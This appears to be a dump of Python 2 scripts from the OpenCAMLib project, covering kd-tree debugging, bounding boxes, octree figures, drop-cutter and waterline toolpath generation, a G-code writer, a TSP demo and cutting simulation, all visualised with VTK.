trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.yellow)
s.jump_kd_up()
print "ymin: jump ONLY lo"
s.jump_kd_lo()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
else:
#print "ymin: jump both hi and lo"
s.jump_kd_hi()
#print "search hi at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
#print "len tlist=", len(tlist), " now level=", s.get_kd_level()
s.jump_kd_up()
s.jump_kd_lo()
#print "search lo at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
return
def drawtriangles(myscreen, trilist, color):
cpp = camvtk.STLSurf(triangleList=trilist)
cpp.SetColor(color)
cpp.SetWireframe()
myscreen.addActor(cpp)
def drawcuts(myscreen, s):
cut = s.get_kd_cut()
if ( cut[0] < 2 ):
print "x cut ",
if ( cut[0] == 0):
print "max"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.green ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.lgreen ) )
else:
print "y cut ",
if ( cut[0] == 2):
print "max"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.pink ) )
if (s.jump_kd_hi()):
drawcuts(myscreen, s)
s.jump_kd_up()
if (s.jump_kd_lo()):
drawcuts(myscreen, s)
s.jump_kd_up()
return
def main():
myscreen = camvtk.VTKScreen()
focal = cam.Point(50, 0, 0)
r = 300
theta = (float(45)/360)*2*math.pi
fi=45
campos = cam.Point( r*math.sin(theta)*math.cos(fi), r*math.sin(theta)*math.sin(fi), r*math.cos(theta) )
myscreen.camera.SetPosition(campos.x, campos.y, campos.z)
myscreen.camera.SetFocalPoint(focal.x,focal.y, focal.z)
t = camvtk.Text()
t.SetPos( (myscreen.width-450, myscreen.height-30) )
myscreen.addActor( t)
t2 = camvtk.Text()
ytext = "kd-tree debug" #"Y: %3.3f" % (ycoord)
t2.SetText(ytext)
t2.SetPos( (50, myscreen.height-50) )
myscreen.addActor( t2)
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
epos = cam.Epos()
epos.setS(0,1)
t.SetText("OpenCAMLib 10.04-beta, " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
#ycoord = 1.1
stl = camvtk.STLSurf(filename="../stl/carpet2.stl")
#stl = camvtk.STLSurf(filename="demo2.stl")
print "STL surface read"
myscreen.addActor(stl)
stl.SetWireframe()
stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s= cam.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STLSurf with ", s.size(), " triangles"
cutterDiameter=7
cutter = cam.CylCutter(cutterDiameter)
cl = cam.Point(31, 42, 3)
cutactor = camvtk.Cylinder(center=(cl.x,cl.y,cl.z),
radius=cutterDiameter/2,
height=2,
rotXYZ=(90,0,0),
color=camvtk.green)
myscreen.addActor( cutactor )
# sphere to see (0,0)
myscreen.addActor( camvtk.Sphere( center=(0,0,0), radius=0.2, color = camvtk.yellow ) )
s.build_kdtree()
print "built kd-tree"
s.jump_kd_reset()
cpp_tlist = s.getTrianglesUnderCutter(cl, cutter)
py_tlist = []
depth = 6
kdtreesearch(myscreen, py_tlist, s, cutter, cl, depth)
print "len(cpp_list) after search=", len(cpp_tlist)
print "len(py_list) after search=", len(py_tlist)
cpp = camvtk.STLSurf(triangleList=cpp_tlist)
cpp.SetColor(camvtk.lgreen)
cpp.SetWireframe()
myscreen.addActor(cpp)
py = camvtk.STLSurf(triangleList=py_tlist)
py.SetColor(camvtk.pink)
py.SetWireframe()
myscreen.addActor(py)
#drawcuts(myscreen, s)
myscreen.render()
myscreen.iren.Start()
time.sleep(2)
exit()
tlist = s.get_kd_triangles()
print "got", len(tlist), " triangles"
while (s.jump_kd_hi()):
lotris = s.get_kd_triangles()
s.jump_kd_up()
cut = s.get_kd_cut()
s.jump_kd_lo()
hitris = s.get_kd_triangles()
lev = s.get_kd_level()
print "l=", lev, " hi=", len(hitris), " lo=", len(lotris), " cut=", cut
if ( cut[0] < 2 ):
print "x cut ",
if ( cut[0] == 0):
print "max"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.green ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.lgreen ) )
else:
print "y cut ",
if ( cut[0] == 2):
print "max"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.pink ) )
slo = camvtk.STLSurf(triangleList=lotris)
slo.SetColor(camvtk.pink)
slo.SetWireframe()
shi = camvtk.STLSurf(triangleList=hitris)
shi.SetColor(camvtk.lgreen)
shi.SetWireframe()
myscreen.addActor(slo)
myscreen.addActor(shi)
myscreen.render()
#myscreen.iren.Start()
#raw_input("Press Enter to terminate")
time.sleep(1)
myscreen.removeActor(slo)
myscreen.removeActor(shi)
print "done."
myscreen.render()
#lwr.SetFileName(filename)
#raw_input("Press Enter to terminate")
time.sleep(0.2)
lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
main()
#raw_input("Press Enter to terminate")
```
#### File: opencamlib/scripts/ocl_bounding-box.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
def drawBB(myscreen, bb):
lines=[]
# x-direction lines, red color
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.minpt.y, bb.minpt.z), color=camvtk.red) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.maxpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.minpt.z), color=camvtk.red) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.maxpt.z), p2=(bb.maxpt.x, bb.minpt.y, bb.maxpt.z), color=camvtk.red) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.maxpt.y, bb.maxpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.red) )
# y-direction lines, green color
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.minpt.x, bb.maxpt.y, bb.minpt.z), color=camvtk.green) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.minpt.z), color=camvtk.green) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.maxpt.z), p2=(bb.minpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.green) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.minpt.y, bb.maxpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.green) )
# z-direction lines, blue color
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.minpt.x, bb.minpt.y, bb.maxpt.z), color=camvtk.blue) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.minpt.y, bb.maxpt.z), color=camvtk.blue) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.maxpt.y, bb.minpt.z), p2=(bb.minpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.blue) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.maxpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.blue) )
for l in lines:
myscreen.addActor(l)
if __name__ == "__main__":
print ocl.revision()
myscreen = camvtk.VTKScreen()
stl = camvtk.STLSurf("../stl/gnu_tux_mod.stl")
#stl = camvtk.STLSurf("../stl/beet_mm.stl")
#stl = camvtk.STLSurf("../stl/Blade.stl")
myscreen.addActor(stl)
stl.SetWireframe()
stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read ", s.size(), " triangles"
minimum_point = s.bb.minpt
maximum_point = s.bb.maxpt
print "min point =", minimum_point
print "max point =", maximum_point
print s.getBounds()
# render the min and max points
myscreen.addActor( camvtk.Sphere( center=(minimum_point.x, minimum_point.y, minimum_point.z), radius=0.1, color=camvtk.red) )
myscreen.addActor( camvtk.Sphere( center=(maximum_point.x, maximum_point.y, maximum_point.z), radius=0.1, color=camvtk.green) )
# render a bounding-box
drawBB( myscreen, s.bb )
myscreen.camera.SetPosition(3, 23, 15)
myscreen.camera.SetFocalPoint(4, 5, 0)
t = camvtk.Text()
t.SetText("OpenCAMLib")
t.SetPos( (myscreen.width-200, myscreen.height-30) )
myscreen.addActor( t)
myscreen.render()
myscreen.iren.Start()
raw_input("Press Enter to terminate")
```
#### File: opencamlib/scripts/octree_fig.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
import math
"""
This scripts draws a picture which enumerates the vertices, edges, and faces
of an octree node, as used in the octree cutting simulation and
marching-cubes.
"""
def main():
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-8, -4, 25)
myscreen.camera.SetFocalPoint(0,0, 0)
arpos=-1.5
camvtk.drawArrows(myscreen,center=(arpos,arpos,arpos))
camvtk.drawOCLtext(myscreen)
octtext = camvtk.Text()
octtext.SetPos( (70, myscreen.height-600) )
myscreen.addActor( octtext)
octtext.SetText("Octree")
vertex = [ ocl.Point( 1, 1,-1), #// 0
ocl.Point(-1, 1,-1), #// 1
ocl.Point(-1,-1,-1), #// 2
ocl.Point( 1,-1,-1), #// 3
ocl.Point( 1, 1, 1), #// 4
ocl.Point(-1, 1, 1), #// 5
ocl.Point(-1,-1, 1), #// 6
ocl.Point( 1,-1, 1) #// 7
]
n=0
for v in vertex:
myscreen.addActor( camvtk.Sphere(center=(v.x,v.y,v.z), radius=0.1,color=camvtk.red))
v=v
t = camvtk.Text3D(color=camvtk.red, center=(v.x+0.1,v.y+0.1,v.z), text=str(n), scale=0.2, camera=myscreen.camera)
myscreen.addActor(t)
n=n+1
edgeTable = [ [0,1] ,
[1,2] ,
[2,3] ,
[3,0] ,
[4,5] ,
[5,6] ,
[6,7] ,
[7,4] ,
[0,4] ,
[1,5] ,
[2,6] ,
[3,7] ,
]
# draw the edges as tubes
ne = 0
for e in edgeTable:
ep1 = vertex[ e[0] ]
ep2 = vertex[ e[1] ]
tu = camvtk.Tube( p1=(ep1.x,ep1.y,ep1.z), p2=(ep2.x,ep2.y,ep2.z), radius=0.051, color=camvtk.green )
myscreen.addActor(tu)
mid = 0.5*(ep1 + ep2)
t = camvtk.Text3D(color=camvtk.green, center=(mid.x+0.1,mid.y+0.1,mid.z), text=str(ne), scale=0.2, camera=myscreen.camera)
myscreen.addActor(t)
ne=ne+1
# number the faces
face = [ [2,3,6,7] ,
[0,3,4,7] ,
[0,1,4,5] ,
[1,2,5,6] ,
[0,1,2,3] ,
[4,5,6,7] ,
]
nf=0
for f in face:
mid = ocl.Point()
for v in f:
mid = mid+vertex[v]
mid=0.25*mid
t = camvtk.Text3D(color=camvtk.blue, center=(mid.x,mid.y,mid.z), text=str(nf), scale=0.2, camera=myscreen.camera)
myscreen.addActor(t)
nf=nf+1
myscreen.render()
print "All done."
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: opencamlib/scripts/pycam_bench.py
```python
import ocl
import camvtk
import time
import vtk
def filter_path(path,tol):
f = ocl.LineCLFilter()
f.setTolerance(tol)
for p in path:
p2 = ocl.CLPoint(p.x,p.y,p.z)
f.addCLPoint(p2)
f.run()
return f.getCLPoints()
def adaptive_path_drop_cutter(s, cutter, path):
apdc = ocl.AdaptivePathDropCutter()
apdc.setSTL(s)
apdc.setCutter(cutter)
# set the minimum Z-coordinate, or "floor" for drop-cutter
#apdc.minimumZ = -1
apdc.setSampling(0.04)
apdc.setMinSampling(0.0008)
apdc.setPath( path )
apdc.run()
return apdc.getCLPoints()
def drawPaths(paths):
ngc_writer.preamble()
for path in cl_filtered_paths:
ngc_writer.pen_up()
first_pt = path[0]
ngc_writer.xy_rapid_to( first_pt.x, first_pt.y )
ngc_writer.pen_down( first_pt.z )
for p in path[1:]:
ngc_writer.line_to(p.x,p.y,p.z)
ngc_writer.postamble()
if __name__ == "__main__":
print ocl.version()
myscreen = camvtk.VTKScreen()
#stl = camvtk.STLSurf("../stl/demo.stl")
stl = camvtk.STLSurf("../stl/pycam-textbox.stl")
print "STL surface read"
myscreen.addActor(stl)
stl.SetWireframe()
polydata = stl.src.GetOutput()
s= ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STLSurf with ", s.size(), " triangles"
print s.getBounds()
# define a cutter
cutter = ocl.CylCutter(10, 50) # diameter, length
#cutter = ocl.BullCutter(0.6, 0.01, 5)
print cutter
#pdc = ocl.PathDropCutter() # create a pdc
apdc = ocl.AdaptivePathDropCutter()
#pdc.setSTL(s)
apdc.setSTL(s)
#pdc.setCutter(cutter) # set the cutter
apdc.setCutter(cutter)
#print "set minimumZ"
#pdc.minimumZ = -1 # set the minimum Z-coordinate, or "floor" for drop-cutter
#apdc.minimumZ = -1
#print "set the sampling interval"
#pdc.setSampling(0.4)
apdc.setSampling(0.4)
apdc.setMinSampling(0.0008)
print " apdc sampling = ", apdc.getSampling()
ymin=0
ymax=50
Ny=40 # number of lines in the y-direction
dy = float(ymax-ymin)/(Ny-1) # the y step-over
# create a simple "Zig" pattern where we cut only in one direction.
paths = []
# create a list of paths
for n in xrange(0,Ny):
path = ocl.Path()
y = ymin+n*dy # current y-coordinate
p1 = ocl.Point(0,y,0) # start-point of line
p2 = ocl.Point(130,y,0) # end-point of line
l = ocl.Line(p1,p2) # line-object
path.append( l ) # add the line to the path
paths.append(path)
cl_paths=[]
# we now have a list of paths to run through apdc
t_before = time.time()
n_aclp=0
for p in paths:
aclp = adaptive_path_drop_cutter(s,cutter,p) # the output is a list of Cutter-Locations
n_aclp = n_aclp + len(aclp)
cl_paths.append(aclp)
t_after = time.time()
print "( OpenCamLib::AdaptivePathDropCutter run took %.2f s )" % ( t_after-t_before )
print "( got %d raw CL-points )" % ( n_aclp )
# to reduce the G-code size we filter here. (this is not strictly required and could be omitted)
# we could potentially detect G2/G3 arcs here, if there was a filter for that.
tol = 0.001
print "( filtering to tolerance %.4f )" % ( tol )
cl_filtered_paths = []
t_before = time.time()
n_filtered=0
for cl_path in cl_paths:
cl_filtered = filter_path(cl_path,tol)
n_filtered = n_filtered + len(cl_filtered)
cl_filtered_paths.append(cl_filtered)
t_after = time.time()
calctime = t_after-t_before
print "( got %d filtered CL-points. Filter done in %.3f s )" % ( n_filtered , calctime )
drawPaths(cl_filtered_paths)
"""
# some parameters for this "zigzig" pattern
ymin=0
ymax=50
Ny=10 # number of lines in the y-direction
dy = float(ymax-ymin)/Ny # the y step-over
print "step-over ",dy
#path = ocl.Path() # create an empty path object
path2 = ocl.Path()
# add Line objects to the path in this loop
for n in xrange(0,Ny):
y = ymin+n*dy
p1 = ocl.Point(0,y,-100) # start-point of line
p2 = ocl.Point(130,y,-100) # end-point of line
#sl = ocl.Line(p1,p2) # line-object
l2 = ocl.Line(p1,p2)
#path.append( l ) # add the line to the path
path2.append( l2 )
print " set the path for pdf "
#pdc.setPath( path )
apdc.setPath( path2 )
#print " run the calculation "
#t_before = time.time()
#pdc.run() # run drop-cutter on the path
#t_after = time.time()
#print " pdc run took ", t_after-t_before," s"
print " run the calculation "
t_before = time.time()
apdc.run() # run drop-cutter on the path
t_after = time.time()
print " apdc run took ", t_after-t_before," s"
print "get the results "
#clp = pdc.getCLPoints() # get the cl-points from pdf
aclp = apdc.getCLPoints()
print "got ", len(aclp) ," adaptive points"
#aclp_lifted=[]
#for p in aclp:
# p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1)
# aclp_lifted.append(p2)
# filter the adaptively sampled toolpaths
print "filtering. before filter we have", len(aclp),"cl-points"
t_before = time.time()
f = ocl.LineCLFilter()
f.setTolerance(0.001)
for p in aclp:
p2 = ocl.CLPoint(p.x,p.y,p.z)
f.addCLPoint(p2)
f.run()
t_after = time.time()
calctime = t_after-t_before
print " done in ", calctime," s"
cl_filtered = f.getCLPoints()
#aclp_lifted2=[]
#for p in cl_filtered:
# p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1)
# aclp_lifted2.append(p2)
print " render the CL-points"
#camvtk.drawCLPointCloud(myscreen, clp)
camvtk.drawCLPointCloud(myscreen, cl_filtered)
for p in cl_filtered:
myscreen.
"""
#camvtk.drawCLPointCloud(myscreen, aclp_lifted2)
#myscreen.addActor( camvtk.PointCloud(pointlist=clp, collist=ccp) )
myscreen.camera.SetPosition(3, 23, 15)
myscreen.camera.SetFocalPoint(5, 5, 0)
myscreen.render()
print " All done."
myscreen.iren.Start()
```
#### File: scripts/toolpath_examples/ngc_writer.py
```python
clearance_height= 20
feed_height = 10
feed = 200
plunge_feed = 100
metric = True
def line_to(x,y,z):
print "G1 X% 8.6f Y% 8.6f Z% 8.6f F%.0f" % (x, y, z, feed)
def xy_line_to(x,y):
print "G1 X% 8.4f Y% 8.4f " % (x, y)
# (endpoint, radius, center, cw?)
def xy_arc_to( x,y, r, cx,cy, cw ):
if (cw):
print "G2 X% 8.5f Y% 8.5f R% 8.5f" % (x, y, r)
else:
print "G3 X% 8.5f Y% 8.5f R% 8.5f" % (x, y, r)
# FIXME: optional IJK format arcs
def xy_rapid_to(x,y):
print "G0 X% 8.4f Y% 8.4f " % (x, y)
def pen_up():
print "G0Z% 8.4f " % (clearance_height)
"""
def pen_down():
print "G0Z% 8.4f" % (feed_height)
plunge(0)
"""
def pen_down(z=0):
print "G0Z% 8.4f" % (feed_height)
plunge(z)
def plunge(z):
print "G1 Z% 8.4f F% 8.0f" % (z, plunge_feed)
def preamble():
if (metric):
print "G21 F% 8.0f" % (feed) # G20 F6 for inch
else:
print "G20 F% 8.0f" % (feed) # G20 F6 for inch
print "G64 P0.001" # linuxcnc blend mode
pen_up()
print "G0 X0 Y0" # this might not be a good idea!?
def postamble():
pen_up()
print "M2" # end of program
def comment(s=""):
print "( ",s," )"
if __name__ == "__main__":
print "Nothing to see here."
```
#### File: scripts/tsp/tsp_04.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
import gzip
import csv
def readPts():
spamReader = csv.reader(open('tsplib/graph.txt', 'rb'), delimiter=',', quotechar='|')
pts=[]
for row in spamReader:
pts.append( ocl.Point( float(row[0]), float(row[1]) ) )
return pts
def drawTour(myscreen, pts, tour, tourColor = camvtk.red):
for n in range(0,len(tour)-1):
idx0 = n
idx1 = n+1
ip1 = pts[ tour[idx0] ]
ip2 = pts[ tour[idx1] ]
myscreen.addActor( camvtk.Line(p1=(ip1.x,ip1.y,ip1.z),p2=(ip2.x,ip2.y,ip2.z), color=tourColor) )
def drawPoints(myscreen, pts):
c=camvtk.PointCloud( pts )
c.SetPoints()
myscreen.addActor(c )
if __name__ == "__main__":
myscreen = camvtk.VTKScreen()
tsp = ocl.TSPSolver()
pts = readPts()
drawPoints(myscreen, pts)
print "got ",len(pts)," points"
#exit()
for p in pts:
tsp.addPoint( p.x , p.y)
start_time = time.time()
tsp.run()
run_time = time.time() - start_time
l = tsp.getLength()
print "tour length ",l
out = tsp.getOutput()
for o in out:
print o,
drawTour(myscreen, pts, out)
myscreen.camera.SetPosition(0.0, 0.0, 200)
myscreen.camera.SetViewUp(0.0, 0.0, 0)
myscreen.camera.SetFocalPoint(50, 50, 0)
myscreen.render()
myscreen.iren.Start()
import ocl
import camvtk
import time
import vtk
import datetime
import math
import gzip
import csv
def readPts():
spamReader = csv.reader(open('tsplib/graph.txt', 'rb'), delimiter=',', quotechar='|')
pts=[]
for row in spamReader:
pts.append( ocl.Point( float(row[0]), float(row[1]) ) )
return pts
def drawTour(myscreen, pts, tour, tourColor = camvtk.red):
for n in range(0,len(tour)-1):
idx0 = n
idx1 = n+1
ip1 = pts[ tour[idx0] ]
ip2 = pts[ tour[idx1] ]
myscreen.addActor( camvtk.Line(p1=(ip1.x,ip1.y,ip1.z),p2=(ip2.x,ip2.y,ip2.z), color=tourColor) )
def drawPoints(myscreen, pts):
c=camvtk.PointCloud( pts )
c.SetPoints()
myscreen.addActor(c )
if __name__ == "__main__":
myscreen = camvtk.VTKScreen()
tsp = ocl.TSPSolver()
pts = readPts()
drawPoints(myscreen, pts)
print "got ",len(pts)," points"
#exit()
for p in pts:
tsp.addPoint( p.x , p.y)
start_time = time.time()
tsp.run()
run_time = time.time() - start_time
l = tsp.getLength()
print "tour length ",l
out = tsp.getOutput()
for o in out:
print o,
drawTour(myscreen, pts, out)
myscreen.camera.SetPosition(0.0, 0.0, 200)
myscreen.camera.SetViewUp(0.0, 0.0, 0)
myscreen.camera.SetFocalPoint(50, 50, 0)
myscreen.render()
myscreen.iren.Start()
```
#### File: scripts/waterline/waterline_6_weave2.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
def waterline_time(zheights, diam, length,s,sampling):
t_total = time.time()
for zh in zheights:
cutter = ocl.BallCutter( diam , length )
wl = ocl.Waterline()
wl.setSTL(s)
wl.setCutter(cutter)
wl.setZ(zh)
wl.setSampling(sampling)
wl.setThreads(1)
wl.run()
cutter_loops = wl.getLoops()
for l in cutter_loops:
loops.append(l)
timeTotal = time.time()-t_total
print " ALL Waterlines done in ", timeTotal ," s"
return timeTotal
if __name__ == "__main__":
print ocl.version()
a = ocl.Point(0,1,0.3)
b = ocl.Point(1,0.5,0.3)
c = ocl.Point(0,0,0)
t = ocl.Triangle(b,c,a)
s = ocl.STLSurf()
s.addTriangle(t) # a one-triangle STLSurf
# alternatively, run on the tux model
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
#myscreen.addActor(stl)
#stl.SetWireframe() # render tux as wireframe
#stl.SetSurface() # render tux as surface
#stl.SetColor(camvtk.cyan)
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
zheights=[-0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.26, 0.27, 0.28, 0.29 ] # the z-coordinates for the waterlines
zheights=[-0.8, -0.7, -0.6, -0.5, -0.4, -0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28 ]
zheights=[ -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28]
zheights=[ 1.75145 ]
diam = 0.6 # run the thing for all these cutter diameters
length = 5
loops = []
cutter = ocl.CylCutter( 1 , 1 )
sampling=0.005
waterline_time(zheights, diam, length,s,sampling)
```
#### File: scripts/waterline/waterline_8_tux_adaptive.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
def drawLoops(myscreen,loops,loopColor):
# draw the loops
nloop = 0
for lop in loops:
n = 0
N = len(lop)
first_point=ocl.Point(-1,-1,5)
previous=ocl.Point(-1,-1,5)
for p in lop:
if n==0: # don't draw anything on the first iteration
previous=p
first_point = p
elif n== (N-1): # the last point
myscreen.addActor( camvtk.Line(p1=(previous.x,previous.y,previous.z),p2=(p.x,p.y,p.z),color=loopColor) ) # the normal line
# and a line from p to the first point
myscreen.addActor( camvtk.Line(p1=(p.x,p.y,p.z),p2=(first_point.x,first_point.y,first_point.z),color=loopColor) )
else:
myscreen.addActor( camvtk.Line(p1=(previous.x,previous.y,previous.z),p2=(p.x,p.y,p.z),color=loopColor) )
previous=p
n=n+1
print "rendered loop ",nloop, " with ", len(lop), " points"
nloop = nloop+1
def getLoops(wl,zh,diam):
t_before = time.time()
wl.reset()
wl.setZ(zh)
wl.run()
t_after = time.time()
calctime = t_after-t_before
print " Waterline done in ", calctime," s"
return wl.getLoops()
if __name__ == "__main__":
print ocl.version()
myscreen = camvtk.VTKScreen()
#stl = camvtk.STLSurf("../../stl/demo.stl")
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
myscreen.addActor(stl)
#stl.SetWireframe() # render tux as wireframe
stl.SetSurface() # render tux as surface
stl.SetColor(camvtk.cyan)
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read,", s.size(), "triangles"
#zh = 1.0
t_before = time.time()
diam = 0.5
zheights=[0.2, 0.4, 0.6, 0.8, 1.0, 1.2, 1.4, 1.6, 1.8, 2.0, 2.2, 2.4, 2.6]
zheights=[float(1.0)]
wl = ocl.Waterline()
#wl = ocl.AdaptiveWaterline()
wl.setSTL(s)
length= 10
cutter = ocl.BallCutter( diam , length )
wl.setCutter(cutter)
wl.setSampling(0.0314)
for zh in zheights:
print "calculating Waterline at z= ", zh
cutter_loops = getLoops(wl,zh,diam)
drawLoops(myscreen,cutter_loops,camvtk.red)
t_after = time.time()
calctime = t_after-t_before
print " TOTAL Waterline time is: ", calctime," s"
print "done."
myscreen.camera.SetPosition(15, 13, 7)
myscreen.camera.SetFocalPoint(5, 5, 0)
camvtk.drawArrows(myscreen,center=(-0.5,-0.5,-0.5))
camvtk.drawOCLtext(myscreen)
myscreen.render()
myscreen.iren.Start()
#raw_input("Press Enter to terminate")
```
#### File: attic/cutsim/cutsim_07_circle.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
import math
def main():
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-15, -8, 15)
myscreen.camera.SetFocalPoint(0,0, 0)
# axis arrows
#camvtk.drawArrows(myscreen,center=(0,0,0))
s = ocl.SphereOCTVolume()
s.center = ocl.Point(-2.50,-0.6,0)
s.radius = 1.1345
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
cp= ocl.Point(0,0,-16)
#depths = [3, 4, 5, 6, 7, 8]
max_depth = 8
root_scale = 16
t = ocl.Octree(root_scale, max_depth, cp)
t.init(4)
n = 0 # the frame number
nmax=80
theta=0
dtheta=0.06
thetalift=-0.01
s.center = ocl.Point( 1.3*math.cos(theta),1.3*math.sin(theta),thetalift*theta)
mc = ocl.MarchingCubes()
while (n<=nmax):
print "diff...",
t_before = time.time()
t.diff_negative(s)
t_after = time.time()
build_time = t_after-t_before
print "done in ", build_time," s"
if n==nmax:
t_before = time.time()
print "mc()...",
tris = mc.mc_tree(t) #.mc_triangles()
t_after = time.time()
mc_time = t_after-t_before
print "done in ", mc_time," s"
print " mc() got ", len(tris), " triangles"
mc_surf = camvtk.STLSurf( triangleList=tris, color=camvtk.red )
#mc_surf.SetWireframe()
mc_surf.SetColor(camvtk.cyan)
print " STLSurf()...",
myscreen.addActor( mc_surf )
print "done."
nodes = t.get_leaf_nodes()
allpoints=[]
#for no in nodes:
# verts = no.vertices()
# for v in verts:
# allpoints.append(v)
#oct_points = camvtk.PointCloud( allpoints )
print " PointCloud()...",
#myscreen.addActor( oct_points )
print "done."
print " render()...",
myscreen.render()
print "done."
#lwr.SetFileName("frames/mc8_frame"+ ('%06d' % n)+".png")
#myscreen.camera.Azimuth( 2 )
#myscreen.render()
#w2if.Modified()
#lwr.Write()
#mc_surf.SetWireframe()
#print "sleep...",
#time.sleep(1.02)
#print "done."
if n is not nmax:
myscreen.removeActor( mc_surf )
#myscreen.removeActor( oct_points )
# move forward
theta = n*dtheta
sp1 = ocl.Point(s.center)
s.center = ocl.Point( 1.3*math.cos(theta),1.3*math.sin(theta),thetalift*theta)
sp2 = ocl.Point(s.center)
print "line from ",sp1," to ",sp2
if n is not nmax:
myscreen.addActor( camvtk.Line( p1=(sp1.x,sp1.y,sp1.z),p2=(sp2.x,sp2.y,sp2.z), color=camvtk.red ) )
print "center moved to", s.center
n=n+1
print "All done."
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: attic/cutsim/cutsim_09_tux_video.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
import math
def main():
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-8, -4, 25)
myscreen.camera.SetFocalPoint(4.5,6, 0)
# axis arrows
camvtk.drawArrows(myscreen,center=(-1,-1,0))
camvtk.drawOCLtext(myscreen)
octtext = camvtk.Text()
octtext.SetPos( (70, myscreen.height-600) )
myscreen.addActor( octtext)
cltext = camvtk.Text()
cltext.SetPos( (70, myscreen.height-100) )
myscreen.addActor( cltext)
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
#myscreen.addActor(stl)
#stl.SetWireframe()
stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read,", s.size(), "triangles"
#angle = math.pi/4
radius = 0.4
length=5
cutter = ocl.BallCutter(2*radius, length)
#cutter = ocl.CylCutter(2*radius, length)
# generate CL-points
minx=0
dx=0.1/0.4
maxx=9
miny=0
dy=cutter.getRadius()/1.5
maxy=12
z=-1
# this generates a list of CL-points in a grid
clpoints = pyocl.CLPointGrid(minx,dx,maxx,miny,dy,maxy,z)
# batchdropcutter
bdc = ocl.BatchDropCutter()
bdc.bucketSize = 7
bdc.setSTL(s)
bdc.setCutter(cutter)
